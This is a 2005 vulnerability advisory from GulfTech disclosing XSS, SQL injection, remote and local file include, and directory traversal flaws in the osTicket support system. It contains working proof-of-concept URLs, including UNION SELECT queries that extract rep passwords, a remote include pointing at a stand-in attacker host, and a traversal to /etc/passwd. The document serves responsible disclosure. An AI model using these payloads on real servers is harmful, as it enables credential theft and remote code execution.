##########################################################
# GulfTech Security Research            May 2nd, 2005
##########################################################
# Vendor  : osTicket
# URL     : http://www.osticket.com/
# Version : All Versions
# Risk    : Multiple Vulnerabilities
##########################################################


Description:
osTicket is a widely-used open source support ticket system. It is a
lightweight support ticket tool written mainly using PHP scripting
language. There are several vulnerabilities in the osTicket software
that may allow for an attacker to take control of the affected web
server, disclose sensitive data from the database, or read arbitrary
files. These issues have been reported to the developers and a new
updated version of osTicket is available for download. All affected
users should upgrade their osTicket installations immediately.


Cross Site Scripting:
Cross site scripting exists in osTicket. This vulnerability exists
due to user supplied input not being checked properly.

http://example.com/view.php?e=test@test.com&t=480826[XSS]
http://example.com/include/header.php?osticket_title=%3C/title%3E[XSS]
http://example.com/include/admin_login.php?em=asdf[XSS]
http://example.com/include/user_login.php?e=asdf[XSS]
http://example.com/include/open_submit.php?err=[XSS]

This vulnerability could be used to steal cookie based authentication
credentials within the scope of the current domain, or render hostile
code in a victim's browser.



Script/HTML Injection:
When adding a ticket an attacker may include malicious script or html
in the name and subject fields and have it rendered in the browser of
anyone who views it (such as an admin) and may be used in part with
CSRF to force users or admins to perform arbitrary commands.



SQL Injection:
osTicket is prone to two SQL Injection issues, one lies in the search
engine, and one lies in viewing tickets. Below are a few examples.

http://example.com/admin.php?a=view&id=-99%20UNION%20SELECT%20username,
password,0,0,0,0,0,0,0,0,0%20FROM%20ticket_reps%20WHERE%201/*

http://example.com/admin.php?a=view&id=-99%20UNION%20SELECT%20username,
password,'your@email.org',0,0,0,0,0,0,0,0%20FROM%20ticket_reps%20WHERE%201/*

http://example.com/view.php?s=advanced&query=&cat=-99%20UNION%20SELECT
%2031337,0,0,0,password%20FROM%20ticket_reps%20WHERE%20ID=5/*&status=&
sort=ID&way=ASC&per=5&search_submit=Search

The first example is not that easy to exploit, and the example I have
given only works if you are logged in as admin. Why is this? Let's have
a look at includes/viewticket.php

//user is allowed to view ticket
$show = $_SESSION[user][type] == "admin" ? 1: !$cat_row[hidden];

$admin_permis = ($_SESSION[user][type] == "admin" and 
(@in_array($cat_row[ID],
$oslogin[cat_access]) or $oslogin[cat_access][0] == "all" or 
$oslogin[ID] ==
ADMIN));
$client_permis = ($_SESSION[user][type] == "client" and 
$ticket_row[email] ==
$_SESSION[user][id]);

if (!$client_permis and !$admin_permis) {
    echo "Access denied.";
}

As we can see from this code we might be able to influence
$ticket_row[email] directly from the query string if magic_quotes_gpc
is off, but a lot of the time it is on. If an attacker cannot
influence the returned email address during a UNION SELECT then he can do
something like SELECT into an outfile or try to enumerate data using built
in MySQL functions. This issue is exploitable, just not as easy as some
SQL Injection issues to exploit because if a certain criteria isn't
returned then you are denied access. The search engine issue on the other
hand is pretty run of the mill and not hard for an attacker to exploit. An
attacker needs to be logged in with at least a user account to exploit
these issues.


Remote File Include Vulnerability:
osTicket is prone to both remote and local file include vulnerabilities
which may allow for an attacker to execute arbitrary commands on the victim
webserver by including malicious files. Lets have a look at the vulnerable
file which is titled "include/main.php"

if ($config[search_disp]) {
    include("$include_dir/search.php");
}

If globals are set to on, and no include restrictions are in effect then
we can include any php code of our choice remotely. Of course the server
hosting the malicious file to be included could not have php enabled, or
the file would be parsed before it reached the victim server.

http://example.com/include/main.php?config[search_disp]=true&include_dir=http://attacker

This issue is very dangerous when present, but regardless of your server
configuration you are still encouraged to upgrade immediately.



Directory Traversal Vulnerability:
There is a directory traversal issue within the attachments.php script used
by osTicket. The good news is that this vulnerability only exists when the
user has activated file uploads (which has to be done manually and is not
present by default), but it should be noted that even if the attachments
have not been activated the error messages outputted by this script still
cause for a cross site scripting issue. Below is an example.

http://example.com/attachments.php?file=../../../../../../../etc/passwd

This vulnerability can be used to retrieve arbitrary files on the target
webserver, and may aid in further attacking a vulnerable system.



Solution:
The developer was contacted in early April, and a patch has been developed
and should be available now.



Related Info:
The original advisory can be found at the following location
http://www.gulftech.org/?node=research&article_id=00071-05022005



Credits:
James Bercegay of the GulfTech Security Research Team